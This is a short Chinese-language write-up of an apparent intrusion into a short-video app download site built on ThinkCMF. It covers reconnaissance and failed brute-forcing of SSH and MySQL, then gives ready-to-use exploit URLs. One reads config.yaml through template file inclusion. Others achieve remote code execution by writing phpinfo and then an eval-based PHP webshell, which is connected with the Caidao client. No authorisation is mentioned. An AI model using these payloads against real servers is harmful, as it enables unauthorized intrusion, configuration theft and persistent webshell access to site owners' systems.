目标站点是一个短视频App下载页面，下面记录一下渗透过程。

信息搜集过程

首先看云悉，收集指纹和资产，也没发现什么可利用的玩意

然后看shodan发现22和3306都是可以利用的，经过一番爆破，无果

寻思微步反查一下域名打算从别的域名下手,也没果，貌似被隐藏了

之后我发现了一个奇怪的玩意，是别的开发系统中都没有的

凭借之前的渗透测试经验和刚刚右下角

发现是是基于ThinkPHP二次开发的ThinkCMF

0x01 thinkcmf 任意文件包含

信息搜集后确定为ThinkCMF，尝试代码执行。
?a=display&templateFile=README.md

返回报错

这里很明显可以确定payload被执行，但是未找到README.md，因为这是一个默认的git介绍页面，被删除是很正常的。

尝试读取config.yaml配置文件
?a=display&templateFile=config.yaml

成功读取config.yaml文件

0x02 thinkcmf rce

写入phpinfo()
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo();?>')</php>

回显未报错

访问写入的test.php文件，成功返回phpinfo()

尝试写入php一句话
?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('h4ck.php','<?php eval($_POST["h4ck"]);?>')</php>

菜刀连接写入的一句话